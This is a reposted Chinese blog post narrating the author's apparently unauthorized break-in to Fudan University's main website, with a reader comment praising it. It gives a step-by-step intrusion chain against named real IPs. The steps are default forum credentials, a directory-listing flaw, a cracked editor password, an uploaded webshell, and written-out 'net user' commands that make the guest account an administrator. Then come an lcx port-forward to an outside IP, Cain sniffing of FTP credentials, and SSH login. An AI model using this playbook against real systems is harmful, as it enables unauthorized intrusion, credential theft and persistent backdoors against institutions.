轉載自:L04sblog

一、師出有名

某日十分無聊，就和X論壇的超級版主wyzhack瞎吹牛，東年西扯的。後來不知道怎麽的扯到復旦去了，他提議說不如我們黑掉復旦吧。正好當時也比較清閑，就答應一起看看了，嘿嘿。這次跑去黑復旦純粹是為了練習技術。

二、戰略部署

這次要拿的是復旦主站，分站可不是我們的目標了，嘿嘿。要不然拿個分站就掛上復旦的名義似乎有點說不過去。通過google順利找到復旦大學主站：http://www.fudan.edu.cn/，如圖1。

PHP的程序，打開了個鏈接，順手加個單撇號，提示"警告！提交的數據非法！"，又試了幾個其他的註入關鍵字，都被過濾掉了。看來直接從主站下手難度比較大，所以我們得想點其他辦法。這裏我打算利用嗅探來獲取目標站的重要信息，嘿嘿。我們都知道可以根據ping一個目標地址的TTL值來大致判斷對方的服務器操作系統！我ping了一下復旦主站，發現TTL值為53，如圖2。

這個數值大致就是Linux的操作系統的了，嘿嘿。要想嗅探就必須要取得與目標服務器同一網段下的某臺服務器權限，然後再安裝嗅探工具進行嗅探攻擊。復旦主站的IP為：61.129.42.5，那我們就必須在61.129.42.*這個網段裏先控制一臺服務器！先用SuperScan3.0掃描整個C段的21端口，作用就是先看看有沒有windows操作系統的服務器在這個網段裏！至於為什麽要掃21嘛，大家都清楚要是裝了Serv-U的話要是沒什麽意外，提權應該是比較容易的嘛，嘿嘿。掃描結果出來了，有好幾臺裝有Serv-U的，按經驗，裝了Serv-U的就肯定是windows系統的了！IP為61.129.42.42這臺明顯就是windows的系統，Serv-U的版本是6.3的，如圖3。

0

三、步步為營

現在目的很明確，就是要先控制住61.129.42.42這臺服務器！在瀏覽器裏面填入IP訪問，發現頁面有點難看，都是些doc文檔下載的東西，對我們來說沒什麽用。我們可以通過查詢域名綁定看看有些什麽站在上面。我一般不用明小子查詢，因為用它能查出來的已經很少了！用X以前介紹過的一個網站來查詢吧，它查出來的比明小子查的數據要多且準！打開 http://www.seologs.com/ip-domains.html，在"Domain or IP address"裏填上"61.129.42.42"，然後點擊"submit"提交，稍等一會就會返回查詢結果的了，如圖4。

只有兩個，似乎不容樂觀哦。居然打開兩個都不能訪問！後來訪問了一下8000端口才有反應了，如圖5。

光在這裏面也看不出什麽來，頁面比較簡單，可利用的地方不多。值得慶幸的是有個"在線論壇"，打開看看，原來是動網的，嘿嘿。用默認的用戶名和密碼嘗試登錄，居然成功了進入了後臺，如圖6。

本以為可以很輕松的拿到webshell的，沒想到這個破論壇既不能上傳也不能備份！動網沒了這兩個功能基本上比較難拿到webshell了，郁悶！於是又上了邪惡八進制發帖討論，沒多久就在回復裏面看到動網還有個後臺列文件的漏洞！嘿嘿，這回似乎又有得搞了！大致方法就是在"基本設置"裏修改"上傳目錄設定"，然後到"上傳文件管理"裏面去查看結果。列了N久終於發現有可利用的東西了，如圖7。

ewebeditor出現了，嘿嘿。點擊打開後臺登錄頁面，如圖8。

嘗試默認的用戶名和密碼發現無法登錄進去，看來密碼改過了。沒關系，反正我們能列文件嘛。再利用動網列文件的漏洞找到了ewebeditor的數據庫文件，下載回來，用明小子的數據庫管理功能打開，查看了管理員密碼的MD5散列，如圖9。

再到MD5查詢網站查詢密碼，幸運的是密碼並不復雜，順利查了出來，如圖10。

用得到的用戶名和密碼成功登錄了ewebeditor的後臺，如圖11。

進了ewebeditor拿webshell就比較輕松的了。樣式管理-拷貝樣式-設置-添加允許上傳類型asa，再預覽上傳asa後綴的ASP馬，然後在"上傳文件管理"裏就可以看到馬的了，點擊直接訪問webshell，如圖12。

在圖12裏面，我們可以看到有ASPNET這個用戶，一般來說很有可能支持ASPX，因為ASPX馬的權限一般要比ASP的高。所以我上傳了一個ASPX馬。然後再傳了一個SU提權的ASP馬，執行："net user guest /active:yes" "net user guest password" "net localgroup administrators guest /add"三條命令，意思是先激活guest用戶，再給guest用戶設定一個密碼，再把guest用戶添加進管理員組。幸運的是Serv-U的默認連接密碼沒有改，命令都成功執行了。在ASPX馬裏執行："net user guest"我們可以發現guest已經隸屬於管理員組了，如圖13。

用ASPX馬讀取了註冊表的遠程桌面服務端口，發現就是默認的3389，不過Terminal Services服務當時是沒有開的。後來wyzhack放了鴿子才給開了，嘿嘿。

四、守株待兔

直接連接3389是行不通的，防火墻把我們擋在了外面。不過我們可以用lcx.exe給它來個端口轉發。直接用ASPX馬或者SU提權馬發現都不能執行lcx.exe進行轉發，所以我想通過修改Serv-U的配置文件來添加一個具體system權限的FTP用戶，再登錄上去進行端口轉發。就是修改C:\Program Files\Serv-U\ServUDaemon.ini這個文件的內容啦。如何修改我就不廢話了，有興趣的話大家可以去了解下SU配置文件的存放規則，了解之後修改起來就得心應手的了。我就添加了一個用戶名為hackest的，擁有system權限的FTP用戶。要是配置文件沒有權限修改的話，可以用SU提權馬執行cacls.exe修改文件屬性為everyone完全控制就可以修改的了，不過cacls.exe需要文件格式為NTFS的才可以使用哦。在CMD下登錄FTP上去，執行：
C:\Documents and Settings\All Users\Documents\lcx.exe -slave 219.129.213.252 51 127.0.0.1 3389
本機執行：
lcx.exe -listen 51 2007
然後連接本機的的2007端口就可以登錄遠程服務器了，如圖14。

到這裏我們就已經成功控制了61.129.42.42這臺服務器。接下來就是安裝cain進行嗅探了，具體請參照我的另一篇關於嗅探入侵的文章。在61.129.42.42上執行"ipconfig /all"命令得知默認網關為61.129.42.1，如圖15。

復旦主站的IP為：61.129.42.5。設置好cain就可以開始嗅探攻擊了，嘿嘿。由於一開始的那幾天是五一假期時間，嗅了兩天一無所獲。N天之後終於有進展了，wyzhack告訴我已經成功嗅探到復旦主站的FTP用戶名和密碼了，如圖16。

對於一個網站，有了FTP密碼就等於有了一切！利用FTP上傳了一個PHP馬，進去參觀一下，如圖17。

五、塵埃落定

到這裏就已經完全控制了復旦大學的主站了！雖然主站的操作系統是Linux，但是我們通過先控制一臺windows的3389肉雞再進行對目標的嗅探攻擊收到了如期的效果。可見嗅探攻擊的威力的確非比尋常，不註意這方面的防範也必將被人惡意入侵！既然是Linux的系統，管理員一般都是用SSH來遠程管理服務器的，嘿嘿。掃描一下主站服務器，發現開了22端口（SSH的默認連接端口為22）嘗試用嗅到的FTP用戶名和密碼登錄SSH居然成功了，如圖18。

至於通過溢出或者其他提權方法來得到root權限，我就不弄了，因為這方面實在不太熟悉。本文主要是介紹一種入侵思路，沒有什麽技術含量。不得不說的一句話：管理員們要小心嗅探攻擊了，嗅探的攻擊力可是比較厲害的。如有不妥之處還請大家批評斧正！

===========================

作者思路很清晰。運氣很好啊。。。遇見沒改密碼的動網論壇。。

亮點算是能在論壇後臺列目錄吧。。順利的列出了ewe編輯器後臺以及數據庫地址。可憐的ewe編輯器不知道害死了多少站長。

【滲透筆記】拿下復旦大學的艱難過程